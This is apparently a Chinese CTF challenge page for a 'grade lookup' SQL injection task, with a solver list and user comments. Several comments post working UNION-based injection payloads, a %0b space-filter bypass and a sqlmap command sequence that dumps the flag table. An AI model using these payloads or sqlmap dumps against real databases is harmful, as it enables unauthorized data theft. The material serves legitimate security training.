成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 11825
提  示:
描  述:
来源山科大ctf
评论
秋刀鱼の丸 3年前

1' and 1=2 union select 1,2,3,skctf_flag from fl4g#

回复 1

jiangyou 3年前

http://t.csdn.cn/GCIkY

回复 1

Hobin 3年前

一个sqlmap就能完美解决

回复 0

MONSTEinCAT 3年前

鸡你太美

回复 1
阿厂 3年前

哎呦你干嘛

回复 0

肥肠粉 3年前

小黑子,哥哥下的蛋你别吃

回复 0

Sauexceed 3年前

小黑子

回复 0

yemur 3年前

id=-1' union select 1,2,3,skctf_flag from fl4g#

回复 0

lysandria 3年前

过滤了一些东西,空格用%0b绕过。payload:id=-1' union%0bselect%0bgroup_concat(skctf_flag),2,3,4%0bfrom fl4g#

回复 0

15338641414 3年前

输入框的sql注入

回复 0

Hey0iopklh 3年前

'闭合,union注入

回复 0

落叶满阶红 3年前

这题啊,,学了sqlmap使用方法。。自动干进去了,python2 sqlmap.py -u “URL地址” --data=”id=1” --current-db查询当前使用数据库,-D skctf(库名) --tables 查下面所有表,-T fl4g(表名)--columns列出所有的字段名,-C skctf_flag --dump列出字段内容,找到flag

回复 9

02 3年前

有的方法flag根本出不来

回复 0

WriteUp

image
harry

2 金币

评分(24)

解题动态

miiko 攻破了该题 8分钟前
anton_小金鱼 攻破了该题 3小时前
L! 攻破了该题 9小时前
box 攻破了该题 12小时前
911 攻破了该题 22小时前
LHM 攻破了该题 23小时前
yue 攻破了该题 23小时前
HZ 攻破了该题 23小时前
wyc 攻破了该题 23小时前
小蓝01 攻破了该题 23小时前
wh 攻破了该题 23小时前
diffni 攻破了该题 23小时前
dianci 攻破了该题 23小时前
cww 攻破了该题 23小时前
qyy 攻破了该题 23小时前
ghj 攻破了该题 23小时前
_T_ 攻破了该题 23小时前
lkgjlkglkw 攻破了该题 23小时前
popppyy 攻破了该题 23小时前
hyxi 攻破了该题 23小时前
问题反馈